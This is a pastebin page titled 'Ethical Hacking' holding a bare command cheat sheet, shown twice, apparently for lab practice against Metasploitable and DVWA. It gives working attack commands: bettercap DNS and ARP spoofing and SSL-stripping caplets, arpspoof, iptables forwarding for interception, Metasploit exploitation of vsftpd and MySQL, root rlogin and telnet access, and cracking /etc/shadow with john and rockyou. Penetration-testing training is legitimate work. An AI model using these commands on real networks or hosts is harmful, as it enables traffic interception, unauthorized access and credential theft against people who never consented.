Ethical Hacking - Code Base

TEXT 23

Ethical Hacking Guest on 18th January 2023 11:23:27 PM

Changing MAC Address in Linux:
macchanger -A eth0 -m 00:11:22:33:44:55
General Linux Commands:
adduser username
passwd username
usermod -a -G sudo username
Other commands:
apt-get install apache2
a2enmod ssl
service apache2 restart
Reading output from WireShark:
http.request.method == POST
DNS Spoofing using bettercap:
bettercap
set dns.spoof.domains example.com,example2.com
set dns.spoof.all true
dns.spoof on
SSL Stripping
bettercap -caplet spoof.cap
spoof.cap file:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets ip address here
arp.spoof on
set net.sniff.local true
net.sniff on
then update the caplets:
caplets.update
DNS Configuration:
yum install bind-utils
/etc/resolv.conf - DNS file
nslookup - to check dns servers
/var/named/named.ca - this file contains the list of root servers
To install Cache only DNS:
sudo apt update (update all the pending repositories if needed)
sudo apt install bind9 (This will install DNS services on the machine)
sudo services named status
sudo services named start
sudo services named stop
Install Zenmap in Linux:
sudo apt install kaboxer –y
sudo apt install zenmap-kbx
kaboxer run zenmap
Tool for information gathering with commands:
netdiscover -i eth0 –r 172.26.0.0/24
netdiscover -r 192.168.0.0/16
netdiscover -r 10.0.0.0/8
ARP Spoofing Tool:
arpspoof -i [interface] -t [clientIP] [gatewayIP]
arpspoof -i [interface] -t [gatewayIP] [clientIP]
Bettercap ARP Spoofing:
apt-get install bettercap
Create a caplet file:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.20.2
arp.spoof on
net.sniff on
Save the file with the name spoof.cap
Run the bettercap with following command:
bettercap -caplet spoof.cap
To save the output to file in bettercap:
events.stream off
set events.stream.output /home/kali/Documents/Log-all.txt
events.stream on
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.100
arp.spoof on
set net.sniff.output /home/kali/Documents/PC-1.cap
net.sniff on
this is important for arp spoofing in kali linux:
iptables -A FORWARD -i eth0 -j ACCEPT
iptables -A FORWARD -o eth0 -j ACCEPT
Metasploitable:
nmap -T4 -A -v ip address
Find which port is open, if port 23 is open, then it means telnet is open
To gain access, use following command:
telnet ip address
Can capture the data using WireShark by putting "telnet" in filter.
Remote Shell Tool:
apt-get install rsh-client
rlogin -l root ip address
Using Metasploit Framework:
msfdb init
msfconsole
db_status - to show the status of the database.
db_nmap -vv ip -sV
vv = very verbose
sV = scan version of services
search vsftpd
use 0
set rhosts ip address
options
exploit
When exploiting MySQL:
search mysql
use 17
set rhost ip
exploit
mysql -u root -h ip address
show databases;
use dvwa;
show tables;
select * from pen_test_tools;
Bruteforce:
Get the /etc/shadow file and then run the bruteforce tool with following command:
john -w=/usr/share/wordlists/rockyou.txt /etc/shadow

Recent Pastes

Advanced Ethical[...]

Raw Paste

Changing MAC Address in Linux:
macchanger -A eth0 -m 00:11:22:33:44:55

General Linux Commands:
adduser username
passwd username
usermod -a -G sudo username

Other commands:
apt-get install apache2
a2enmod ssl
service apache2 restart

Reading output from WireShark:
http.request.method == POST

DNS Spoofing using bettercap:
bettercap
set dns.spoof.domains example.com,example2.com
set dns.spoof.all true
dns.spoof on

SSL Stripping
bettercap -caplet spoof.cap
spoof.cap file:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets ip address here
arp.spoof on
set net.sniff.local true
net.sniff on

then update the caplets:
caplets.update

DNS Configuration:
yum install bind-utils
/etc/resolv.conf - DNS file
nslookup - to check dns servers
/var/named/named.ca - this file contains the list of root servers
To install Cache only DNS:
sudo apt update (update all the pending repositories if needed)
sudo apt install bind9 (This will install DNS services on the machine)
sudo services named status
sudo services named start
sudo services named stop

Install Zenmap in Linux:
sudo apt install kaboxer –y
sudo apt install zenmap-kbx
kaboxer run zenmap

Tool for information gathering with commands:
netdiscover -i eth0 –r 172.26.0.0/24
netdiscover -r 192.168.0.0/16
netdiscover -r 10.0.0.0/8

ARP Spoofing Tool:
arpspoof -i [interface] -t [clientIP] [gatewayIP]
arpspoof -i [interface] -t [gatewayIP] [clientIP]

Bettercap ARP Spoofing:
apt-get install bettercap
Create a caplet file:

net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.20.2
arp.spoof on
net.sniff on

Save the file with the name spoof.cap
Run the bettercap with following command:
bettercap -caplet spoof.cap

To save the output to file in bettercap:
events.stream off
set events.stream.output /home/kali/Documents/Log-all.txt
events.stream on
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.100
arp.spoof on
set net.sniff.output /home/kali/Documents/PC-1.cap
net.sniff on

this is important for arp spoofing in kali linux:
iptables -A FORWARD -i eth0 -j ACCEPT
iptables -A FORWARD -o eth0 -j ACCEPT

Metasploitable:
nmap -T4 -A -v ip address
Find which port is open, if port 23 is open, then it means telnet is open
To gain access, use following command:
telnet ip address
Can capture the data using WireShark by putting "telnet" in filter.

Remote Shell Tool:
apt-get install rsh-client
rlogin -l root ip address

Using Metasploit Framework:
msfdb init
msfconsole
db_status - to show the status of the database.
db_nmap -vv ip -sV
vv = very verbose
sV = scan version of services
search vsftpd
use 0
set rhosts ip address
options
exploit

When exploiting MySQL:
search mysql
use 17
set rhost ip
exploit

mysql -u root -h ip address
show databases;
use dvwa;
show tables;
select * from pen_test_tools;

Bruteforce:
Get the /etc/shadow file and then run the bruteforce tool with following command:
john -w=/usr/share/wordlists/rockyou.txt /etc/shadow